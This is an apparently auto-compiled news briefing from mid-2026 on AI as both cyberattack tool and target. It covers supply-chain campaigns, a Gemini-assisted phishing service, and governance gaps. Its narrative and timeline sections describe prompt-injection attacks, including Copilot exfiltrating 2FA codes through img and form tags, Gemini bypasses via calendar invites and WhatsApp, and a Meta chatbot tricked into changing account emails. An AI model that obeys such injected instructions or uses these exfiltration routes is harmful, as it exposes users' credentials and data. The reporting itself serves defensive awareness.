AI as Attack Tool and Attack Target: May 2026 Cybersecurity Moment · history

Version 18

2026-06-18 08:13 UTC · 610 items

What

AI is simultaneously being weaponized by attackers and exploited as an attack surface across a cluster of campaigns and disclosures running from late April through mid-June 2026. A maximum-critical vulnerability in M365 Copilot, disclosed June 16, allowed attackers to steal 2FA codes and sensitive email data by embedding instructions in third-party content Copilot processes [8], adding to documented prompt injection exploits across Google Gemini and Meta's AI chatbot. Google's lawsuit against the Chinese Outsider Enterprise network details a phishing-as-a-service model priced at $88/week, with $1.9 billion in attributed losses since July 2023 and 3.87 million stolen credit card numbers linked by the FBI [17]. The Mini Shai-Hulud supply chain campaign compromised 1,000+ SaaS environments, approximately 3,800 GitHub repositories, and 30 EU institutions [1][4][2], and Anthropic's Frontier Red Team found AI use in post-compromise attack phases rose 8.9% among 832 banned malicious accounts [18].

Why it matters

AI is expanding the threat on both sides simultaneously: it lowers the technical barrier for attackers to near-zero (phishing-as-a-service at $88/week, malware authorship in two-thirds of banned accounts) while creating attack surfaces researchers now characterize as structurally unfixable in current LLM architectures [8]. Autonomous AI cyber capability is doubling approximately every 4.7 months [22], and the two main threat-modeling frameworks defenders rely on both lack coverage for the autonomous agentic attack mode growing fastest [19][24].

Open questions

Ars Technica reports Microsoft and other LLM providers have 'no fundamental fix' for prompt injection and rely on ad hoc guardrails that can be circumvented [8] — has any major provider disputed this characterization or outlined an architectural counter-approach?
SafeBreach documented three distinct Gemini bypass techniques [9][10][11] — has Google issued a structural response, or only patched each vector individually?
The CSA confirms both MITRE ATT&CK and MITRE ATLAS lack coverage for autonomous agentic orchestration [24] — are either framework bodies actively working to address this, and on what timeline?
Will the CAISI voluntary framework extend to govern Mythos-class deployment in Glasswing's ~200-partner program, given that expansion without CAISI review is the core governance critique? [21][25]

Narrative

The Mini Shai-Hulud campaign, launched by threat actor TeamPCP on May 11, 2026, confirmed impact across more than 1,000 SaaS environments [1], approximately 3,800–4,000 GitHub internal repositories stolen via a poisoned VS Code extension [2][3], and 30 EU institutions breached via the Trivy container scanner [4]. Concurrent campaigns hit additional trust surfaces: an AntV ecosystem attack faked Sigstore provenance badges across 600+ packages [5], TrapDoor compromised 34+ packages across npm, PyPI, and crates.io [6], and 73 Microsoft-signed packages contained credential-stealing code that activated specifically when developers opened them in AI coding agents [7]. GitHub removed the packages citing a terms-of-service violation rather than warning developers their systems may be compromised; Microsoft did not publicly acknowledge the possibility of malicious content until days after removal [7].

AI-connected products are under attack at multiple layers. A maximum-critical vulnerability in Microsoft 365 Copilot allowed attackers to steal 2FA codes and sensitive email data accessible to Copilot; the bypass wrapped stolen data in HTML constructs — img and form tags — to trigger outbound requests to attacker-controlled servers [8]. Ars Technica reports Microsoft and other providers have no fundamental fix for prompt injection, leaving them to erect 'complicated and ad hoc guardrails' around what it characterizes as 'incurable gullibility' in current LLMs [8]. This assessment fits a pattern: SafeBreach documented three separate bypasses of Google Gemini's defenses via voice injection [9], Google Calendar invites [10], and WhatsApp 'Fake Context Alignment' across six messaging platforms [11]. Meta's AI support chatbot was exploited to take over high-profile Instagram accounts, including the Obama White House account, by asking it to substitute a new email during a password reset; Meta had deployed the bot with direct account-modification authority and no identity verification, and issued an emergency patch after the fact [12][13]. Simon Willison's 'Lethal Trifecta' framework names private data access, exposure to untrusted content, and an exfiltration channel as the structural condition enabling LLM data theft; he argues OpenAI's Lockdown Mode addresses only the third leg, implying ChatGPT's default configuration does not robustly block determined exfiltration [14].

AI is also being deployed at scale to run attacks with minimal technical skill. Google sued the Chinese Outsider Enterprise network for operating phishing-as-a-service toolkits on Telegram at $88/week, with 290+ pre-built templates requiring no coding ability and including instructions for using Gemini to build fake websites impersonating Google, YouTube, government agencies, banks, and toll agencies [15][16][17]. The FBI links the network to 3.87 million stolen credit card numbers; the group is estimated to have caused $1.9 billion in losses since July 2023, sent 2.5 million fraudulent texts to Android users, and generated 9,000 fake websites [17]. Anthropic's Frontier Red Team found corroborating aggregate data in 832 banned malicious accounts: 67.3% used AI to write malware, AI use in post-compromise attack phases rose 8.9% [18], and medium-to-high risk actors grew from 33% to 56% — roughly a 1.7-fold increase — with traditional signals such as technique count no longer reliably separating sophisticated from novice attackers [19].

Governance is running behind capability. NIST's CAISI framework evaluates submitted models but does not cover deployment programs [20]. Anthropic's Project Glasswing — now at approximately 200 partners in 15+ countries across power, water, healthcare, and critical infrastructure — reports 10,000+ high- or critical-severity flaws found using Mythos Preview, and Anthropic argues controlled deployment under structured conditions is preferable to waiting while competitors deploy comparable capability without safeguards [21]. AISI measured autonomous AI cyber capability as doubling approximately every 4.7 months, with Claude Mythos as the first AI to complete both UK offensive cyber ranges autonomously [22][23]. The Cloud Security Alliance confirmed that both MITRE ATT&CK and MITRE ATLAS lack coverage for the autonomous agentic orchestration attack mode this capability class enables [24], and neither framework body has publicly responded to the documented gap.

Timeline

2026-05-05: NIST's CAISI formalized as US pre-deployment AI compliance gate with agreements covering Google, Microsoft, and xAI [20]
2026-05-11: TeamPCP launches Mini Shai-Hulud; 160+ npm and PyPI packages compromised; two OpenAI employee devices breached with code-signing certificates exfiltrated [31][32][33]
2026-05-11: Google GTIG intercepts the first confirmed criminal AI-generated zero-day targeting a 2FA hardcoded trust assumption [26][34][35]
2026-05-13: AISI evaluates Claude Mythos Preview as first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability doubling every 4.7 months [31][36][22]
2026-05-18: TeamPCP advertises Mistral AI source code — 450 repositories — for sale at $25,000; Mistral confirms impact [37][38][39]
2026-05-20: GitHub confirms theft of approximately 3,800–4,000 internal repositories via a poisoned Nx Console VS Code extension [2][3][40]
2026-05-23: AntV ecosystem attack confirmed with 600+ packages faking Sigstore provenance badges [5][41]
2026-05-24: CERT-EU confirms European Commission breach across 30 EU institutions via Trivy; Mandiant quantifies 1,000+ SaaS compromises; TrapDoor supply chain attack hits 34+ packages [4][1][6]
2026-05-26: Starlette/ASGI critical vulnerability affects 325M weekly downloads including MCP servers; Microsoft patches four Copilot CVEs following documented data exfiltration [42][29][30]
2026-05-29: Meta issues emergency patch after its AI support chatbot is exploited to take over high-profile Instagram accounts including the Obama White House account [12][13]
2026-06-02: Anthropic expands Project Glasswing to ~200 partners in 15+ countries; reports 10,000+ critical flaws found; releases Claude Security on Opus 4.8 [21]
2026-06-03: Anthropic FRT publishes empirical data on 832 banned attackers: medium-to-high risk actors up 1.7-fold; AI use in post-compromise phases rose 8.9%; MITRE ATT&CK agentic gap identified [19][18]
2026-06-04: SafeBreach documents third Gemini bypass via WhatsApp 'Fake Context Alignment'; Google DeepMind documents agent-detecting malicious websites across six attack types [11][27][9][10]
2026-06-05: Simon Willison introduces 'Lethal Trifecta' framework; argues OpenAI Lockdown Mode addresses only the exfiltration leg of the structural condition enabling LLM data theft [14]
2026-06-08: 73 Microsoft-signed packages with AI-agent-triggered credential stealers blocked; GitHub describes removal as a terms-of-service violation [7]
2026-06-11: CSA gap analysis confirms neither MITRE ATT&CK nor MITRE ATLAS fully covers autonomous agentic orchestration [24]
2026-06-12: Google sues Chinese Outsider Enterprise for using Gemini to run phishing-as-a-service: $88/week, 290+ templates, $1.9B in estimated losses, 3.87M stolen credit card numbers per FBI [15][16][17]
2026-06-16: Ars Technica reports maximum-critical M365 Copilot vulnerability allowed 2FA code theft via prompt injection; researchers characterize prompt injection as structurally unfixable in current LLMs [8]

Perspectives

SafeBreach Labs

Has documented three successful bypasses of Google Gemini's prompt injection defenses: voice/audio injection, Google Calendar invites, and WhatsApp 'Fake Context Alignment' across six messaging platforms.

Evolution: Consistent across all three findings; the pattern of repeated bypass of patched defenses reinforces a structural critique.

[9][10][11]

Anthropic

Expanding Project Glasswing to ~200 partners on a proactive-defense rationale — controlled deployment under structured conditions is preferable because Mythos-class capability will be widely available within 6–12 months — while FRT empirical data documents AI democratizing sophisticated post-compromise attack techniques, including a 1.7-fold growth in medium-to-high risk actors and 8.9% rise in AI use in post-compromise phases.

Evolution: FRT data adds empirical grounding to the Glasswing defensive rationale while independently documenting the offensive democratization the project is meant to counter.

[21][19][18]

GitHub / Microsoft

Characterized the theft of 3,800–4,000 internal repositories as limited impact, described removal of 73 malicious packages as a terms-of-service violation, and patched a maximum-critical Copilot vulnerability allowing 2FA theft that researchers frame as a symptom of prompt injection's structural unfixability.

Evolution: The June 16 Copilot 2FA vulnerability extends the pattern of patch-by-patch responses; Ars Technica's 'no fundamental fix' framing now attaches directly to a Microsoft product disclosure.

[2][7][8]

Google (GTIG / DeepMind / Legal)

GTIG confirmed the first criminal AI-generated zero-day; DeepMind documented malicious websites targeting AI agents; Google Legal sued Outsider Enterprise for using Gemini to deliver phishing-as-a-service at $88/week, causing an estimated $1.9 billion in losses and 3.87 million stolen credit card numbers per FBI.

Evolution: The Outsider Enterprise lawsuit adds a legal enforcement dimension to Google's previously research-only posture, while simultaneously illustrating that Google's own model was weaponized against users.

[26][27][15][17]

Simon Willison

Introduced the 'Lethal Trifecta' (private data access + untrusted content + exfiltration channel) as the structural condition enabling LLM data theft; argues Lockdown Mode addresses only the third leg, and that the Meta AI exploit 'hardly qualifies as prompt injection' — the real failure was Meta granting account-modification authority without identity verification.

Evolution: Consistent; Lockdown Mode analysis extends his design-failure thesis into a general architectural principle, separate from the specific Meta critique.

[14][12]

AISI (UK AI Safety Institute)

Claude Mythos is the first AI to autonomously complete both UK offensive cyber ranges; autonomous AI cyber capability is doubling approximately every 4.7 months, warranting urgent governance attention.

Evolution: Consistent; Anthropic's FRT risk-actor growth data and 6–12 month competitive projection independently corroborate AISI's urgency framing.

[22][23]

AuthMind + Turing Institute CETAS

The CAISI voluntary framework evaluates only submitted models; Anthropic's Glasswing expansion to 200 partners without CAISI review is precisely the unaudited frontier deployment their governance critique describes.

Evolution: Consistent; Anthropic's FRT publication deepens the empirical urgency case without addressing the governance-framework critique.

[25][28][23]

Cloud Security Alliance

Published a gap analysis concluding that both MITRE ATT&CK and MITRE ATLAS lack adequate coverage for autonomous agentic orchestration.

Evolution: Extends the ATT&CK agentic gap Anthropic FRT identified to cover ATLAS as well; neither MITRE body has responded.

[24]

Tensions

Ars Technica reports Microsoft and other LLM providers have 'no fundamental fix' for prompt injection and rely on ad hoc guardrails that bypasses continue to circumvent; Microsoft responds with discrete CVE patches rather than disputing this structural characterization [8]. [8][29][30]
GitHub removed 73 malicious Microsoft-signed packages and described the action as a terms-of-service violation; Ars Technica argues this framing misled users about potential system compromise, consistent with GitHub's earlier minimized characterization of the internal repository theft [7][2]. [7][2]
Anthropic argues deploying Glasswing to 200 partners under controlled conditions is preferable to waiting for competitors to deploy Mythos-class capability without safeguards; AuthMind and CETAS argue this expansion without CAISI review is precisely the unaudited frontier deployment their governance critique describes [21][25]. [21][25]
Willison concludes OpenAI Lockdown Mode's existence implies ChatGPT in default settings does not robustly block determined exfiltration; OpenAI has not directly contested this characterization [14]. [14]
Willison argues the Meta AI Instagram exploit 'hardly even qualifies as prompt injection' — the failure was Meta granting its support bot direct account-modification authority without identity verification — while Ars Technica frames it as a prompt injection attack demonstrating AI's susceptibility to manipulation [12][13]. [12][13]
Anthropic FRT and CSA both identified MITRE ATT&CK and ATLAS coverage gaps for agentic orchestration; neither MITRE body has publicly responded to or acknowledged the gap [19][24]. [19][24]

Sources

[1] TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments — reactive:ai-security-nexus
[2] Nx Console 18.95.0 Incident: How TeamPCP Breached GitHub — reactive:ai-security-nexus
[3] GitHub just confirmed that attackers stole about 3,800 internal repositories after a poisoned VS Code extension compromi… — Rohan Paul Twitter (2026-05-20)
[4] European Commission cloud breach: a supply-chain compromise — reactive:ai-security-nexus
[5] Mini Shai-Hulud Returns: 600+Malicious npm Packages Fake Sigstore Badges in AntV Ecosystem Attack — reactive:ai-security-nexus
[6] TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages... — reactive:ai-offensive-cyber
[7] For the 2nd time in weeks, Microsoft packages laced with credential stealer — Ars Technica AI (2026-06-08)
[8] Critical Copilot vulnerability allowed hackers to steal 2FA code from users — Ars Technica AI (2026-06-16)
[9] Exploiting Gemini via Prompt Injection | SafeBreach Original Research — reactive:ai-security-nexus
[10] Invitation Is All You Need: Hacking Gemini | SafeBreach — reactive:ai-security-nexus
[11] 😺 Google Gemini got hijacked via WhatsApp — The Neuron (2026-06-04)
[12] Hackers duped Meta AI support chatbot to steal celebrity Instagram accounts — Ars Technica AI (2026-06-01)
[13] Hackers Simply Asked Meta AI to Give Them Access to High-Profile Instagram Accounts. It Worked — Simon Willison (2026-06-01)
[14] OpenAI Help: Lockdown Mode — Simon Willison (2026-06-05)
[15] Google sues Chinese cybercrime network that used Gemini to automate scams — Ars Technica AI (2026-06-12)
[16] Google Sues to Stop Chinese Cybercrime Group from Using Its A.I. — reactive:ai-security-nexus
[17] 😺 Google sued the people spamming your phone — The Neuron (2026-06-16)
[18] Gap: Anthropic mapped 832 banned accounts onto MITRE ATT&CK. AI in the back half of attacks jumped 8.9%; phishing dr... — reactive:ai-security-nexus (2026-06-14)
[19] What we learned mapping a year’s worth of AI-enabled cyber threats — Anthropic News (2026-06-03)
[20] US government expands vetting of frontier AI models for security risks — reactive:ai-security-nexus
[21] Expanding Project Glasswing — Anthropic News (2026-06-02)
[22] Our evaluation of Claude Mythos Preview's cyber capabilities — reactive:frontier-ai-cyber-capabilities
[23] AISI: autonomous AI cyber capability now doubling every 4.7 months — reactive:ai-offensive-cyber
[24] MITRE ATT&CK and ATLAS Agentic Gap Analysis - Lab Space — reactive:ai-security-nexus
[25] When a Lab Withholds Its Best Model: What the Claude Mythos System Card Signals for Cybersecurity — reactive:ai-security-nexus
[26] Google Researchers Detect First AI-Built Zero-Day Exploit in Cyberattack - Bloomberg — reactive:ai-offensive-cyber
[27] This Google DeepMind’s paper is a serious warning for anyone using autonomous agents today. — Rohan Paul Twitter (2026-06-04)
[28] Claude Mythos: What Does Anthropic's New Model Mean for the ... — reactive:ai-security-nexus
[29] Microsoft 365 Copilot Information Disclosure CVEs (CVE-2026-26129, CVE-2026-26164, CVE-2026-33111) | PointGuard AI — reactive:ai-security-nexus
[30] CVE-2026-26137: Microsoft 365 Copilot SSRF Vulnerability — reactive:ai-security-nexus
[31] Our response to the TanStack npm supply chain attack — OpenAI Blog (2026-05-13)
[32] Mini Shai-Hulud: TeamPCP compromette 160+ pacchetti npm e PyPI in un supply chain attack che ha colpito TanStack, Mistra... — reactive:ai-security-nexus (2026-05-19)
[33] A Self-Spreading Supply Chain Attack Compromises TanStack npm ... — reactive:ai-security-nexus
[34] Google Detects First AI-Generated Zero-Day Exploit - SecurityWeek — reactive:ai-offensive-cyber
[35] Google spotted an AI-developed zero-day before attackers could use it | CyberScoop — reactive:ai-offensive-cyber
[36] How fast is autonomous AI cyber capability advancing? — reactive:ai-offensive-cyber (2026-05-13)
[37] TeamPCP vende repo Mistral AI dopo attacco TanStack su OpenAI — reactive:ai-security-nexus (2026-05-18)
[38] Hackers threaten to leak Mistral files online — AI giant confirms breach, but not what data is involved | TechRadar — reactive:ai-offensive-cyber
[39] TeamPCP Claims Sale of Mistral AI Repositories Amid Mini Shai ... — reactive:ai-security-nexus
[40] GitHub Says 3,800 Repositories Breached—TeamPCP Hackers ... — reactive:ai-security-nexus
[41] Shai-Hulud/Megalodon: A Two-Wave AI Developer Supply Chain ... — reactive:ai-offensive-cybersecurity
[42] Millions of AI agents imperiled by critical vulnerability in open source package — Ars Technica AI (2026-05-26)